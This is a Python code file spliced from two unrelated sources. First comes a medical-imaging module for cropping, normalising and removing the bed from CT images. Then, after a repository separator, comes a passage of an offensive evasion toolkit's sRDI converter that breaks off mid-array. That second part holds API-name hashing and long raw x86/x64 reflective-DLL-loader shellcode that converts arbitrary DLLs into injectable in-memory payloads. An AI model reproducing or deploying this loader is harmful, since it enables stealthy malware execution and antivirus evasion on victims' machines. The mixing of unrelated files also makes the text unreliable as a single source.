# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import multiprocessing as mp
os.environ["ITK_GLOBAL_DEFAULT_NUMBER_OF_THREADS"] = str(mp.cpu_count())
import SimpleITK as sitk
import numpy as np
import torch as th
from .image import Image
def auto_crop_image_filter(image, boundary_value=0):
"""
    Performs automatic cropping of image boundary regions that contain only the given boundary value
image (Image): image which has to be cropped
boundary_value (float|int): specifies the boundary value which will be cropped
return (Image): a new image with cropped boundary
"""
msk = 1 - (image.image.squeeze() == boundary_value)
rminmax = []
for d in range(len(msk.shape)):
region = msk.argmax(dim=d).nonzero()
rminmax.append((region.min(dim=0)[0], region.max(dim=0)[0]))
#print(rminmax[-1])
if image.ndim == 2:
cropped = image.image.squeeze()[rminmax[1][0]:rminmax[1][1], rminmax[0][0]:rminmax[0][1]]
origin = image.origin + th.Tensor(image.spacing) * th.Tensor([rminmax[1][0], rminmax[0][0]])
elif image.ndim == 3:
cropped = image.image.squeeze()[rminmax[1][0][0]:rminmax[1][1][0], \
rminmax[0][0][0]:rminmax[0][1][0], \
rminmax[0][0][1]:rminmax[0][1][1]]
#print(cropped.shape)
origin = th.Tensor(image.origin) + th.Tensor(image.spacing) * th.Tensor([rminmax[1][0][0], rminmax[0][0][0],rminmax[0][0][1]])
else:
raise Exception("Only 2 and 3 space dimensions supported")
size = tuple(cropped.shape)
cropped.unsqueeze_(0).unsqueeze_(0)
return Image(cropped, size, image.spacing, origin.tolist())
def normalize_images(fixed_image, moving_image):
"""
    Normalize image intensities by subtracting the joint minimum and dividing by the joint maximum
    Note: the function modifies the images in place
fixed_image (Image): fixed image
moving_image (Image): moving image
return (Image, Image): normalized images
"""
fixed_min = fixed_image.image.min()
moving_min = moving_image.image.min()
min_val = min(fixed_min, moving_min)
fixed_image.image -= min_val
moving_image.image -= min_val
moving_max = moving_image.image.max()
fixed_max = fixed_image.image.max()
max_val = max(fixed_max, moving_max)
fixed_image.image /= max_val
moving_image.image /= max_val
return (fixed_image, moving_image)
def remove_bed_filter(image, cropping=True):
"""
Removes fine structures from the image using morphological operators. It can be used to remove the bed structure
usually present in CT images. The resulting image and the respective body mask can be cropped with the cropping
option.
Note: the morphological operations are performed on a downsampled version of the image
image (Image): image of interest
cropping (bool): specifies if the image should be cropped after bed removal
return (Image, Image): bed-free image and a body mask
"""
# define parameters
houndsfield_min = -300
houndsfield_max = 3071
houndsfield_default = -1024
radius_opening = 3
radius_closing = 40
image_itk = image.itk()
# resample image
workingSize = np.array(image.size)
workingSize[0] /= 3
workingSize[1] /= 3
workingSpacing = np.array(image.spacing, dtype=float) * np.array(image.size, dtype=float) / np.array(workingSize, dtype=float)
resampler = sitk.ResampleImageFilter()
resampler.SetOutputOrigin(image.origin)
resampler.SetSize(workingSize.tolist())
resampler.SetOutputSpacing(workingSpacing.tolist())
resampler.SetInterpolator(2) # linear interpolation
resampler.SetNumberOfThreads(mp.cpu_count())
image_tmp = resampler.Execute(image_itk)
# threshold image
thresholder = sitk.BinaryThresholdImageFilter()
thresholder.SetOutsideValue(0)
thresholder.SetInsideValue(1)
thresholder.SetLowerThreshold(houndsfield_min)
thresholder.SetUpperThreshold(houndsfield_max)
thresholder.SetNumberOfThreads(mp.cpu_count())
image_tmp = thresholder.Execute(image_tmp)
# morphological opening with ball as structuring element
# removes thin structures as the bed
opening = sitk.BinaryMorphologicalOpeningImageFilter()
opening.SetKernelType(sitk.sitkBall)
opening.SetKernelRadius(radius_opening)
opening.SetForegroundValue(1)
opening.SetNumberOfThreads(mp.cpu_count())
image_tmp = opening.Execute(image_tmp)
# crop zero values from mask boundary
if cropping:
image_tmp = auto_crop_image_filter(Image(image_tmp).to(device=image.device)).itk()
# morphological closing with ball as structuring element
# fills up the lungs
closing = sitk.BinaryMorphologicalClosingImageFilter()
    closing.SetKernelType(sitk.sitkBall)
closing.SetKernelRadius(radius_closing)
closing.SetForegroundValue(1)
closing.SetNumberOfThreads(mp.cpu_count())
image_tmp = closing.Execute(image_tmp)
# resample mask to original spacing
mask_size = np.array(np.array(image_tmp.GetSpacing(), dtype=float)*np.array(image_tmp.GetSize(),dtype=float)/np.array(image.spacing, dtype=float), dtype=int).tolist()
resampler = sitk.ResampleImageFilter()
resampler.SetOutputOrigin(image_tmp.GetOrigin())
resampler.SetSize(mask_size)
resampler.SetOutputSpacing(image.spacing)
resampler.SetInterpolator(1) # nearest neighbor interpolation
resampler.SetNumberOfThreads(mp.cpu_count())
bodyMask = resampler.Execute(image_tmp)
# resample also original image
resampler.SetInterpolator(2)
image_itk = resampler.Execute(image_itk)
# mask image with found label map
masking = sitk.MaskImageFilter()
masking.SetMaskingValue(0)
masking.SetOutsideValue(houndsfield_default)
masking.SetNumberOfThreads(mp.cpu_count())
outImage = masking.Execute(image_itk, bodyMask)
return (Image(outImage).to(device=image.device), Image(bodyMask).to(device=image.device))
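# Hedged usage sketch (not part of the original module): `ct_image` is assumed
# to already be an airlab Image wrapping a CT volume in Hounsfield units, and
# `some_moving_image` a second Image to register against it.
#
#   body_image, body_mask = remove_bed_filter(ct_image, cropping=True)
#   fixed_norm, moving_norm = normalize_images(body_image, some_moving_image)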
|
inceptor/converters/sRDI.py
|
pwnmeow/inceptor
| 743 |
85170
|
<reponame>pwnmeow/inceptor<filename>inceptor/converters/sRDI.py
import base64
import struct
from converters.Transformer import Transformer
class sRDI(Transformer):
MACHINE_IA64 = 512
MACHINE_AMD64 = 34404
def __init__(self):
super().__init__()
self.flags = 0 | 0x1 | 0x4 | 30 << 16
self.function = "DllMain"
self.args = b"test"
self.filetype = "dll"
@staticmethod
def is64BitDLL(_bytes):
header_offset = struct.unpack("<L", _bytes[60:64])[0]
machine = struct.unpack("<H", _bytes[header_offset + 4:header_offset + 4 + 2])[0]
if machine == sRDI.MACHINE_IA64 or machine == sRDI.MACHINE_AMD64:
return True
return False
@staticmethod
def ror(val, r_bits, max_bits):
return ((val & (2 ** max_bits - 1)) >> r_bits % max_bits) | \
(val << (max_bits - (r_bits % max_bits)) & (2 ** max_bits - 1))
@staticmethod
def HashFunctionName(name, module=None):
function = name.encode() + b'\x00'
if module:
module = module.upper().encode('UTF-16LE') + b'\x00\x00'
function_hash = 0
for b in function:
function_hash = sRDI.ror(function_hash, 13, 32)
function_hash += b
module_hash = 0
for b in module:
module_hash = sRDI.ror(module_hash, 13, 32)
module_hash += b
function_hash += module_hash
if function_hash > 0xFFFFFFFF:
function_hash -= 0x100000000
else:
function_hash = 0
for b in function:
function_hash = sRDI.ror(function_hash, 13, 32)
function_hash += b
return function_hash
@staticmethod
def ConvertToShellcode(dll_bytes, function_hash=0x10, user_data=b'None', flags=0):
# MARKER:S
rdi_shellcode32 = b'\x81\xEC\x14\x01\x00\x00\x53\x55\x56\x57\x6A\x6B\x58\x6A\x65\x66\x89\x84\x24\xCC\x00\x00' \
b'\x00\x33\xED\x58\x6A\x72\x59\x6A\x6E\x5B\x6A\x6C\x5A\x6A\x33\x66\x89\x84\x24\xCE\x00\x00' \
b'\x00\x66\x89\x84\x24\xD4\x00\x00\x00\x58\x6A\x32\x66\x89\x84\x24\xD8\x00\x00\x00\x58\x6A' \
b'\x2E\x66\x89\x84\x24\xDA\x00\x00\x00\x58\x6A\x64\x66\x89\x84\x24\xDC\x00\x00\x00\x58\x89' \
b'\xAC\x24\xB0\x00\x00\x00\x89\x6C\x24\x34\x89\xAC\x24\xB8\x00\x00\x00\x89\xAC\x24\xC4\x00' \
b'\x00\x00\x89\xAC\x24\xB4\x00\x00\x00\x89\xAC\x24\xAC\x00\x00\x00\x89\xAC\x24\xE0\x00\x00' \
b'\x00\x66\x89\x8C\x24\xCC\x00\x00\x00\x66\x89\x9C\x24\xCE\x00\x00\x00\x66\x89\x94\x24\xD2' \
b'\x00\x00\x00\x66\x89\x84\x24\xDA\x00\x00\x00\x66\x89\x94\x24\xDC\x00\x00\x00\x66\x89\x94' \
b'\x24\xDE\x00\x00\x00\xC6\x44\x24\x3C\x53\x88\x54\x24\x3D\x66\xC7\x44\x24\x3E\x65\x65\xC6' \
b'\x44\x24\x40\x70\x66\xC7\x44\x24\x50\x4C\x6F\xC6\x44\x24\x52\x61\x88\x44\x24\x53\x66\xC7' \
b'\x44\x24\x54\x4C\x69\xC6\x44\x24\x56\x62\x88\x4C\x24\x57\xC6\x44\x24\x58\x61\x88\x4C\x24' \
b'\x59\x66\xC7\x44\x24\x5A\x79\x41\x66\xC7\x44\x24\x44\x56\x69\x88\x4C\x24\x46\x66\xC7\x44' \
b'\x24\x47\x74\x75\xC6\x44\x24\x49\x61\x88\x54\x24\x4A\xC6\x44\x24\x4B\x41\x88\x54\x24\x4C' \
b'\x88\x54\x24\x4D\x66\xC7\x44\x24\x4E\x6F\x63\x66\xC7\x44\x24\x5C\x56\x69\x88\x4C\x24\x5E' \
b'\x66\xC7\x44\x24\x5F\x74\x75\xC6\x44\x24\x61\x61\x88\x54\x24\x62\xC6\x44\x24\x63\x50\x88' \
b'\x4C\x24\x64\xC7\x44\x24\x65\x6F\x74\x65\x63\xC6\x44\x24\x69\x74\xC6\x84\x24\x94\x00\x00' \
b'\x00\x46\x88\x94\x24\x95\x00\x00\x00\xC7\x84\x24\x96\x00\x00\x00\x75\x73\x68\x49\x88\x9C' \
b'\x24\x9A\x00\x00\x00\x66\xC7\x84\x24\x9B\x00\x00\x00\x73\x74\x88\x8C\x24\x9D\x00\x00\x00' \
b'\xC7\x84\x24\x9E\x00\x00\x00\x75\x63\x74\x69\xC6\x84\x24\xA2\x00\x00\x00\x6F\x6A\x65\x59' \
b'\x88\x8C\x24\xA8\x00\x00\x00\x88\x4C\x24\x6D\x88\x4C\x24\x74\x88\x4C\x24\x79\x88\x8C\x24' \
b'\x92\x00\x00\x00\xB9\x13\x9C\xBF\xBD\x88\x9C\x24\xA3\x00\x00\x00\xC7\x84\x24\xA4\x00\x00' \
b'\x00\x43\x61\x63\x68\xC6\x44\x24\x6C\x47\xC7\x44\x24\x6E\x74\x4E\x61\x74\x66\xC7\x44\x24' \
b'\x72\x69\x76\xC7\x44\x24\x75\x53\x79\x73\x74\x66\xC7\x44\x24\x7A\x6D\x49\x88\x5C\x24\x7C' \
b'\x66\xC7\x44\x24\x7D\x66\x6F\x66\xC7\x84\x24\x80\x00\x00\x00\x52\x74\x88\x94\x24\x82\x00' \
b'\x00\x00\xC6\x84\x24\x83\x00\x00\x00\x41\x88\x84\x24\x84\x00\x00\x00\x88\x84\x24\x85\x00' \
b'\x00\x00\x66\xC7\x84\x24\x86\x00\x00\x00\x46\x75\x88\x9C\x24\x88\x00\x00\x00\xC7\x84\x24' \
b'\x89\x00\x00\x00\x63\x74\x69\x6F\x88\x9C\x24\x8D\x00\x00\x00\x66\xC7\x84\x24\x8E\x00\x00' \
b'\x00\x54\x61\xC6\x84\x24\x90\x00\x00\x00\x62\x88\x94\x24\x91\x00\x00\x00\xE8\x77\x08\x00' \
b'\x00\xB9\xB5\x41\xD9\x5E\x8B\xF0\xE8\x6B\x08\x00\x00\x8B\xD8\x8D\x84\x24\xC8\x00\x00\x00' \
b'\x6A\x18\x89\x84\x24\xEC\x00\x00\x00\x58\x66\x89\x84\x24\xE6\x00\x00\x00\x66\x89\x84\x24' \
b'\xE4\x00\x00\x00\x8D\x44\x24\x1C\x50\x8D\x84\x24\xE8\x00\x00\x00\x89\x5C\x24\x34\x50\x55' \
b'\x55\xFF\xD6\x6A\x0C\x5F\x8D\x44\x24\x44\x66\x89\x7C\x24\x14\x89\x44\x24\x18\x8D\x44\x24' \
b'\x34\x50\x55\x8D\x44\x24\x1C\x66\x89\x7C\x24\x1E\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x0E\x58' \
b'\x66\x89\x44\x24\x14\x66\x89\x44\x24\x16\x8D\x44\x24\x5C\x89\x44\x24\x18\x8D\x84\x24\xB4' \
b'\x00\x00\x00\x50\x55\x8D\x44\x24\x1C\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x15\x58\x66\x89\x44' \
b'\x24\x14\x66\x89\x44\x24\x16\x8D\x84\x24\x94\x00\x00\x00\x89\x44\x24\x18\x8D\x84\x24\xB8' \
b'\x00\x00\x00\x50\x55\x8D\x44\x24\x1C\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x13\x5E\x8D\x44\x24' \
b'\x6C\x66\x89\x74\x24\x14\x89\x44\x24\x18\x8D\x84\x24\xC4\x00\x00\x00\x50\x55\x8D\x44\x24' \
b'\x1C\x66\x89\x74\x24\x1E\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x05\x58\x66\x89\x44\x24\x14\x66' \
b'\x89\x44\x24\x16\x8D\x44\x24\x3C\x89\x44\x24\x18\x8D\x84\x24\xAC\x00\x00\x00\x50\x55\x8D' \
b'\x44\x24\x1C\x50\xFF\x74\x24\x28\xFF\xD3\x8D\x84\x24\x80\x00\x00\x00\x66\x89\x74\x24\x14' \
b'\x89\x44\x24\x18\x8D\x84\x24\xE0\x00\x00\x00\x50\x55\x8D\x44\x24\x1C\x66\x89\x74\x24\x1E' \
b'\x50\xFF\x74\x24\x28\xFF\xD3\x8D\x44\x24\x50\x66\x89\x7C\x24\x14\x89\x44\x24\x18\x8D\x84' \
b'\x24\xB0\x00\x00\x00\x50\x55\x8D\x44\x24\x1C\x66\x89\x7C\x24\x1E\x50\xFF\x74\x24\x28\xFF' \
b'\xD3\x39\x6C\x24\x34\x0F\x84\x00\x07\x00\x00\x39\xAC\x24\xB4\x00\x00\x00\x0F\x84\xF3\x06' \
b'\x00\x00\x39\xAC\x24\xAC\x00\x00\x00\x0F\x84\xE6\x06\x00\x00\x39\xAC\x24\xB8\x00\x00\x00' \
b'\x0F\x84\xD9\x06\x00\x00\x8B\xAC\x24\xC4\x00\x00\x00\x85\xED\x0F\x84\xCA\x06\x00\x00\x8B' \
b'\xBC\x24\x28\x01\x00\x00\x8B\x77\x3C\x03\xF7\x81\x3E\x50\x45\x00\x00\x0F\x85\xB2\x06\x00' \
b'\x00\xB8\x4C\x01\x00\x00\x66\x39\x46\x04\x0F\x85\xA3\x06\x00\x00\xF6\x46\x38\x01\x0F\x85' \
b'\x99\x06\x00\x00\x0F\xB7\x4E\x14\x33\xDB\x0F\xB7\x56\x06\x83\xC1\x24\x85\xD2\x74\x1E\x03' \
b'\xCE\x83\x79\x04\x00\x8B\x46\x38\x0F\x45\x41\x04\x03\x01\x8D\x49\x28\x3B\xC3\x0F\x46\xC3' \
b'\x8B\xD8\x83\xEA\x01\x75\xE4\x8D\x84\x24\x00\x01\x00\x00\x50\xFF\xD5\x8B\x8C\x24\x04\x01' \
b'\x00\x00\x8D\x51\xFF\x8D\x69\xFF\xF7\xD2\x03\x6E\x50\x8D\x41\xFF\x03\xC3\x23\xEA\x23\xC2' \
b'\x3B\xE8\x0F\x85\x3D\x06\x00\x00\x6A\x04\x68\x00\x30\x00\x00\x55\xFF\x76\x34\xFF\x54\x24' \
b'\x44\x8B\xD8\x89\x5C\x24\x2C\x85\xDB\x75\x13\x6A\x04\x68\x00\x30\x00\x00\x55\x50\xFF\x54' \
b'\x24\x44\x8B\xD8\x89\x44\x24\x2C\xF6\x84\x24\x38\x01\x00\x00\x01\x74\x23\x8B\x47\x3C\x89' \
b'\x43\x3C\x8B\x4F\x3C\x3B\x4E\x54\x73\x2E\x8B\xEF\x8D\x14\x0B\x2B\xEB\x8A\x04\x2A\x41\x88' \
b'\x02\x42\x3B\x4E\x54\x72\xF4\xEB\x19\x33\xED\x39\x6E\x54\x76\x12\x8B\xD7\x8B\xCB\x2B\xD3' \
b'\x8A\x04\x11\x45\x88\x01\x41\x3B\x6E\x54\x72\xF4\x8B\x6B\x3C\x33\xC9\x03\xEB\x89\x4C\x24' \
b'\x10\x33\xC0\x89\x6C\x24\x28\x0F\xB7\x55\x14\x83\xC2\x28\x66\x3B\x45\x06\x73\x31\x03\xD5' \
b'\x33\xF6\x39\x32\x76\x19\x8B\x42\x04\x8B\x4A\xFC\x03\xC6\x03\xCB\x8A\x04\x38\x88\x04\x31' \
b'\x46\x3B\x32\x72\xEB\x8B\x4C\x24\x10\x0F\xB7\x45\x06\x41\x83\xC2\x28\x89\x4C\x24\x10\x3B' \
b'\xC8\x72\xD1\x8B\xC3\xC7\x84\x24\xBC\x00\x00\x00\x01\x00\x00\x00\x2B\x45\x34\x89\x44\x24' \
b'\x24\x0F\x84\xC4\x00\x00\x00\x83\xBD\xA4\x00\x00\x00\x00\x0F\x84\xB7\x00\x00\x00\x8B\xB5' \
b'\xA0\x00\x00\x00\x03\xF3\x83\x3E\x00\x0F\x84\xA6\x00\x00\x00\x6A\x02\x8B\xF8\x5D\x8D\x56' \
b'\x08\xEB\x75\x0F\xB7\x02\x89\x44\x24\x10\x0F\xB7\xC8\x66\xC1\xE8\x0C\x66\x83\xF8\x0A\x75' \
b'\x28\x8B\x16\x8B\x4C\x24\x10\x81\xE1\xFF\x0F\x00\x00\x89\x4C\x24\x10\x8D\x04\x1A\x8B\x0C' \
b'\x08\x8D\x04\x1A\x8B\x54\x24\x10\x03\xCF\x89\x0C\x10\x8B\x54\x24\x24\xEB\x37\x66\x83\xF8' \
b'\x03\x75\x0D\x81\xE1\xFF\x0F\x00\x00\x03\x0E\x01\x3C\x19\xEB\x24\x66\x3B\x84\x24\xBC\x00' \
b'\x00\x00\x75\x07\x8B\xC7\xC1\xE8\x10\xEB\x08\x66\x3B\xC5\x75\x0E\x0F\xB7\xC7\x81\xE1\xFF' \
b'\x0F\x00\x00\x03\x0E\x01\x04\x19\x03\xD5\x8B\x46\x04\x03\xC6\x89\x54\x24\x24\x3B\xD0\x0F' \
b'\x85\x7A\xFF\xFF\xFF\x83\x3A\x00\x8B\xF2\x0F\x85\x6A\xFF\xFF\xFF\x8B\x6C\x24\x28\x8B\xBC' \
b'\x24\x28\x01\x00\x00\x83\xBD\x84\x00\x00\x00\x00\x0F\x84\xD7\x01\x00\x00\x8B\xB5\x80\x00' \
b'\x00\x00\x33\xC0\x89\x44\x24\x10\x8D\x0C\x1E\x89\x4C\x24\x24\x83\xC1\x0C\x39\x01\x74\x0D' \
b'\x8D\x49\x14\x40\x83\x39\x00\x75\xF7\x89\x44\x24\x10\x8B\x8C\x24\x38\x01\x00\x00\x8B\xD1' \
b'\x83\xE2\x04\x89\x54\x24\x38\x8B\xD6\x0F\x84\xC3\x00\x00\x00\x83\xF8\x01\x0F\x86\xBA\x00' \
b'\x00\x00\x83\xA4\x24\xBC\x00\x00\x00\x00\xC1\xE9\x10\x89\x8C\x24\x38\x01\x00\x00\x8D\x48' \
b'\xFF\x89\x8C\x24\xC0\x00\x00\x00\x85\xC9\x0F\x84\xA1\x00\x00\x00\x8B\x74\x24\x24\x8B\xDE' \
b'\x8B\xAC\x24\xBC\x00\x00\x00\x8B\xC8\x69\xFF\xFD\x43\x03\x00\x2B\xCD\x33\xD2\xB8\xFF\x7F' \
b'\x00\x00\xF7\xF1\x81\xC7\xC3\x9E\x26\x00\x33\xD2\x89\xBC\x24\x28\x01\x00\x00\x6A\x05\x8D' \
b'\x48\x01\x8B\xC7\xC1\xE8\x10\x8D\xBC\x24\xF0\x00\x00\x00\x25\xFF\x7F\x00\x00\xF7\xF1\x59' \
b'\x03\xC5\x6B\xC0\x14\x6A\x05\x03\xC6\x45\x8B\xF0\xF3\xA5\x59\x8B\xF3\x8B\xF8\x8B\x44\x24' \
b'\x10\xF3\xA5\x6A\x05\x8B\xFB\x8D\xB4\x24\xF0\x00\x00\x00\x59\xF3\xA5\x8B\xBC\x24\x28\x01' \
b'\x00\x00\x83\xC3\x14\x8B\x74\x24\x24\x3B\xAC\x24\xC0\x00\x00\x00\x72\x87\x8B\x6C\x24\x28' \
b'\x8B\x5C\x24\x2C\x8B\x95\x80\x00\x00\x00\xEB\x0B\x8B\x44\x24\x38\x89\x84\x24\x38\x01\x00' \
b'\x00\x8D\x3C\x1A\x8B\x47\x0C\x89\x7C\x24\x2C\x85\xC0\x0F\x84\xB8\x00\x00\x00\x03\xC3\x50' \
b'\xFF\x94\x24\xB4\x00\x00\x00\x8B\xD0\x89\x54\x24\x1C\x8B\x37\x8B\x6F\x10\x03\xF3\x03\xEB' \
b'\x8B\x0E\x85\xC9\x74\x60\x8B\x7C\x24\x30\x85\xC9\x79\x09\x0F\xB7\x06\x55\x50\x6A\x00\xEB' \
b'\x36\x83\xC1\x02\x33\xC0\x03\xCB\x89\x8C\x24\xC0\x00\x00\x00\x38\x01\x74\x0E\x40\x41\x80' \
b'\x39\x00\x75\xF9\x8B\x8C\x24\xC0\x00\x00\x00\x55\x66\x89\x44\x24\x18\x66\x89\x44\x24\x1A' \
b'\x8D\x44\x24\x18\x6A\x00\x89\x4C\x24\x20\x50\x52\xFF\xD7\x83\xC6\x04\x83\xC5\x04\x8B\x0E' \
b'\x85\xC9\x74\x06\x8B\x54\x24\x1C\xEB\xA8\x8B\x7C\x24\x2C\x83\x7C\x24\x38\x00\x74\x1C\x33' \
b'\xC0\x40\x39\x44\x24\x10\x76\x13\x69\x84\x24\x38\x01\x00\x00\xE8\x03\x00\x00\x50\xFF\x94' \
b'\x24\xB0\x00\x00\x00\x8B\x47\x20\x83\xC7\x14\x89\x7C\x24\x2C\x85\xC0\x0F\x85\x4C\xFF\xFF' \
b'\xFF\x8B\x6C\x24\x28\x83\xBD\xE4\x00\x00\x00\x00\x0F\x84\xAD\x00\x00\x00\x8B\x85\xE0\x00' \
b'\x00\x00\x83\xC0\x04\x03\xC3\x89\x44\x24\x10\x8B\x00\x85\xC0\x0F\x84\x94\x00\x00\x00\x8B' \
b'\x6C\x24\x10\x03\xC3\x50\xFF\x94\x24\xB4\x00\x00\x00\x8B\xC8\x89\x4C\x24\x1C\x8B\x75\x08' \
b'\x8B\x7D\x0C\x03\xF3\x03\xFB\x83\x3E\x00\x74\x5B\x8B\x6C\x24\x30\x8B\x17\x85\xD2\x79\x09' \
b'\x56\x0F\xB7\xC2\x50\x6A\x00\xEB\x30\x83\xC2\x02\x33\xC0\x03\xD3\x89\x54\x24\x38\x38\x02' \
b'\x74\x0B\x40\x42\x80\x3A\x00\x75\xF9\x8B\x54\x24\x38\x56\x66\x89\x44\x24\x18\x66\x89\x44' \
b'\x24\x1A\x8D\x44\x24\x18\x6A\x00\x89\x54\x24\x20\x50\x51\xFF\xD5\x83\xC6\x04\x83\xC7\x04' \
b'\x83\x3E\x00\x74\x06\x8B\x4C\x24\x1C\xEB\xAD\x8B\x6C\x24\x10\x83\xC5\x20\x89\x6C\x24\x10' \
b'\x8B\x45\x00\x85\xC0\x0F\x85\x74\xFF\xFF\xFF\x8B\x6C\x24\x28\x0F\xB7\x75\x14\x33\xC0\x83' \
b'\xC6\x28\x33\xFF\x66\x3B\x45\x06\x0F\x83\xE5\x00\x00\x00\x03\xF5\xBA\x00\x00\x00\x40\x83' \
b'\x3E\x00\x0F\x84\xC5\x00\x00\x00\x8B\x4E\x14\x8B\xC1\x25\x00\x00\x00\x20\x75\x0B\x85\xCA' \
b'\x75\x07\x85\xC9\x78\x03\x40\xEB\x62\x85\xC0\x75\x30\x85\xCA\x75\x08\x85\xC9\x79\x04\x6A' \
b'\x08\xEB\x51\x85\xC0\x75\x20\x85\xCA\x74\x08\x85\xC9\x78\x04\x6A\x02\xEB\x41\x85\xC0\x75' \
b'\x10\x85\xCA\x74\x08\x85\xC9\x79\x04\x6A\x04\xEB\x31\x85\xC0\x74\x4A\x85\xCA\x75\x08\x85' \
b'\xC9\x78\x04\x6A\x10\xEB\x21\x85\xC0\x74\x3A\x85\xCA\x75\x0B\x85\xC9\x79\x07\xB8\x80\x00' \
b'\x00\x00\xEB\x0F\x85\xC0\x74\x27\x85\xCA\x74\x0D\x85\xC9\x78\x09\x6A\x20\x58\x89\x44\x24' \
b'\x20\xEB\x1A\x85\xC0\x74\x12\x85\xCA\x74\x0E\x8B\x44\x24\x20\x85\xC9\x6A\x40\x5A\x0F\x48' \
b'\xC2\xEB\xE4\x8B\x44\x24\x20\xF7\x46\x14\x00\x00\x00\x04\x74\x09\x0D\x00\x02\x00\x00\x89' \
b'\x44\x24\x20\x8D\x4C\x24\x20\x51\x50\x8B\x46\xFC\xFF\x36\x03\xC3\x50\xFF\x94\x24\xC4\x00' \
b'\x00\x00\xBA\x00\x00\x00\x40\x0F\xB7\x45\x06\x47\x83\xC6\x28\x3B\xF8\x0F\x82\x22\xFF\xFF' \
b'\xFF\x6A\x00\x6A\x00\x6A\xFF\xFF\x94\x24\xC4\x00\x00\x00\x83\xBD\xC4\x00\x00\x00\x00\x74' \
b'\x26\x8B\x85\xC0\x00\x00\x00\x8B\x74\x18\x0C\x8B\x06\x85\xC0\x74\x16\x33\xED\x45\x6A\x00' \
b'\x55\x53\xFF\xD0\x8D\x76\x04\x8B\x06\x85\xC0\x75\xF1\x8B\x6C\x24\x28\x33\xC0\x40\x50\x50' \
b'\x8B\x45\x28\x53\x03\xC3\xFF\xD0\x83\xBC\x24\x2C\x01\x00\x00\x00\x0F\x84\xAB\x00\x00\x00' \
b'\x83\x7D\x7C\x00\x0F\x84\xA1\x00\x00\x00\x8B\x55\x78\x03\xD3\x8B\x6A\x18\x85\xED\x0F\x84' \
b'\x91\x00\x00\x00\x83\x7A\x14\x00\x0F\x84\x87\x00\x00\x00\x8B\x7A\x20\x8B\x4A\x24\x03\xFB' \
b'\x83\x64\x24\x30\x00\x03\xCB\x85\xED\x74\x74\x8B\x37\xC7\x44\x24\x10\x00\x00\x00\x00\x03' \
b'\xF3\x74\x66\x8A\x06\x84\xC0\x74\x1A\x8B\x6C\x24\x10\x0F\xBE\xC0\x03\xE8\xC1\xCD\x0D\x46' \
b'\x8A\x06\x84\xC0\x75\xF1\x89\x6C\x24\x10\x8B\x6A\x18\x8B\x84\x24\x2C\x01\x00\x00\x3B\x44' \
b'\x24\x10\x75\x04\x85\xC9\x75\x15\x8B\x44\x24\x30\x83\xC7\x04\x40\x83\xC1\x02\x89\x44\x24' \
b'\x30\x3B\xC5\x72\xAE\xEB\x20\x0F\xB7\x09\x8B\x42\x1C\xFF\xB4\x24\x34\x01\x00\x00\xFF\xB4' \
b'\x24\x34\x01\x00\x00\x8D\x04\x88\x8B\x04\x18\x03\xC3\xFF\xD0\x59\x59\x8B\xC3\xEB\x02\x33' \
b'\xC0\x5F\x5E\x5D\x5B\x81\xC4\x14\x01\x00\x00\xC3\x83\xEC\x14\x64\xA1\x30\x00\x00\x00\x53' \
b'\x55\x56\x8B\x40\x0C\x57\x89\x4C\x24\x1C\x8B\x78\x0C\xE9\xA5\x00\x00\x00\x8B\x47\x30\x33' \
b'\xF6\x8B\x5F\x2C\x8B\x3F\x89\x44\x24\x10\x8B\x42\x3C\x89\x7C\x24\x14\x8B\x6C\x10\x78\x89' \
b'\x6C\x24\x18\x85\xED\x0F\x84\x80\x00\x00\x00\xC1\xEB\x10\x33\xC9\x85\xDB\x74\x2F\x8B\x7C' \
b'\x24\x10\x0F\xBE\x2C\x0F\xC1\xCE\x0D\x80\x3C\x0F\x61\x89\x6C\x24\x10\x7C\x09\x8B\xC5\x83' \
b'\xC0\xE0\x03\xF0\xEB\x04\x03\x74\x24\x10\x41\x3B\xCB\x72\xDD\x8B\x7C\x24\x14\x8B\x6C\x24' \
b'\x18\x8B\x44\x2A\x20\x33\xDB\x8B\x4C\x2A\x18\x03\xC2\x89\x4C\x24\x10\x85\xC9\x74\x34\x8B' \
b'\x38\x33\xED\x03\xFA\x83\xC0\x04\x89\x44\x24\x20\x8A\x0F\xC1\xCD\x0D\x0F\xBE\xC1\x03\xE8' \
b'\x47\x84\xC9\x75\xF1\x8B\x7C\x24\x14\x8D\x04\x2E\x3B\x44\x24\x1C\x74\x20\x8B\x44\x24\x20' \
b'\x43\x3B\x5C\x24\x10\x72\xCC\x8B\x57\x18\x85\xD2\x0F\x85\x50\xFF\xFF\xFF\x33\xC0\x5F\x5E' \
b'\x5D\x5B\x83\xC4\x14\xC3\x8B\x74\x24\x18\x8B\x44\x16\x24\x8D\x04\x58\x0F\xB7\x0C\x10\x8B' \
b'\x44\x16\x1C\x8D\x04\x88\x8B\x04\x10\x03\xC2\xEB\xDB '
rdi_shellcode64 = b'\x48\x8B\xC4\x48\x89\x58\x08\x44\x89\x48\x20\x4C\x89\x40\x18\x89\x50\x10\x55\x56\x57\x41' \
b'\x54\x41\x55\x41\x56\x41\x57\x48\x8D\x6C\x24\x90\x48\x81\xEC\x70\x01\x00\x00\x45\x33\xFF' \
b'\xC7\x45\xD8\x6B\x00\x65\x00\x48\x8B\xF1\x4C\x89\x7D\xF8\xB9\x13\x9C\xBF\xBD\x4C\x89\x7D' \
b'\xC8\x4C\x89\x7D\x08\x45\x8D\x4F\x65\x4C\x89\x7D\x10\x44\x88\x4D\xBC\x44\x88\x4D\xA2\x4C' \
b'\x89\x7D\x00\x4C\x89\x7D\xF0\x4C\x89\x7D\x18\x44\x89\x7D\x24\x44\x89\x7C\x24\x2C\xC7\x45' \
b'\xDC\x72\x00\x6E\x00\xC7\x45\xE0\x65\x00\x6C\x00\xC7\x45\xE4\x33\x00\x32\x00\xC7\x45\xE8' \
b'\x2E\x00\x64\x00\xC7\x45\xEC\x6C\x00\x6C\x00\xC7\x44\x24\x40\x53\x6C\x65\x65\xC6\x44\x24' \
b'\x44\x70\xC7\x44\x24\x58\x4C\x6F\x61\x64\xC7\x44\x24\x5C\x4C\x69\x62\x72\xC7\x44\x24\x60' \
b'\x61\x72\x79\x41\xC7\x44\x24\x48\x56\x69\x72\x74\xC7\x44\x24\x4C\x75\x61\x6C\x41\xC7\x44' \
